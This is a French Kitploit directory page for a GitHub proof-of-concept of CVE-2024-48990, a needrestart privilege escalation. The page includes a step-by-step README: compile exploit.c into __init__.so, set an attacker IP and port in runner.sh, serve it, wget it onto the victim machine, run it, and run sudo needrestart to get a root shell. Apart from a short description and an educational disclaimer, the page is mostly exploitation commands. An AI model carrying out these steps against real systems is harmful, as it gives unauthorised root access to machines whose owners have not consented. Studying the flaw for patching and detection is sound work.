Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-48990 — PoC sur CVE-2024-48990. Qualys a découvert que needrestart, avant la version 3.8, permet aux attaquants locaux d'exécuter du code arbitraire en tant que root en trompant needrestart pour qu'il exécute l'interpréteur Python avec une variable d'environnement PYTHONPATH contrôlée par l'attaquant. (NIST) | Kitploit
Outils/GitHubGitHub/grecosamuel/cve-2024-48990
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et Éducation
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

PoC sur CVE-2024-48990. Qualys a découvert que needrestart, avant la version 3.8, permet aux attaquants locaux d'exécuter du code arbitraire en tant que root en trompant needrestart pour qu'il exécute l'interpréteur Python avec une variable d'environnement PYTHONPATH contrôlée par l'attaquant. (NIST)

1il y a 8 moisPas encore vérifié
Partager

CVE-2024-48990

[!WARNING] Ces fichiers et informations sont destinés uniquement à des fins éducatives. L'auteur n'est pas responsable de tout comportement malveillant. Toutes les informations fournies n'ont pas pour but d'inciter à un type de crime ou d'abus.

Description

Qualys a découvert que needrestart, avant la version 3.8, permet à des attaquants locaux d'exécuter du code arbitraire en tant que root en trompant needrestart pour qu'il exécute l'interpréteur Python avec une variable d'environnement PYTHONPATH contrôlée par l'attaquant. Consultez NIST pour les détails officiels.

PoC

  1. Téléchargez le dépôt depuis git

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. Compilez la bibliothèque exploit.c pour générer une bibliothèque ELF valide et nommez-la init.so

gcc -shared -fPIC -o __init__.so exploit.c

  1. Changez et dans runner.sh, ligne 7 et ligne 10, avec votre IP et PORT de votre propre serveur web.
  2. Démarrez le serveur web

python3 -m http.server

  1. Téléchargez runner sur la machine de la victime

wget http://IP:PORT/runner.sh

  1. Attribuez la permission d'exécution à runner

chmod +x runner.sh

  1. Exécutez le script

./runner.sh

  1. Exécutez needrestart avec les permissions sudo

sudo needrestart

Quand vous lisez [*] CVE module created, appuyez sur CTRL+C pour arrêter le processus et obtenir votre shell !

Télécharger l’outil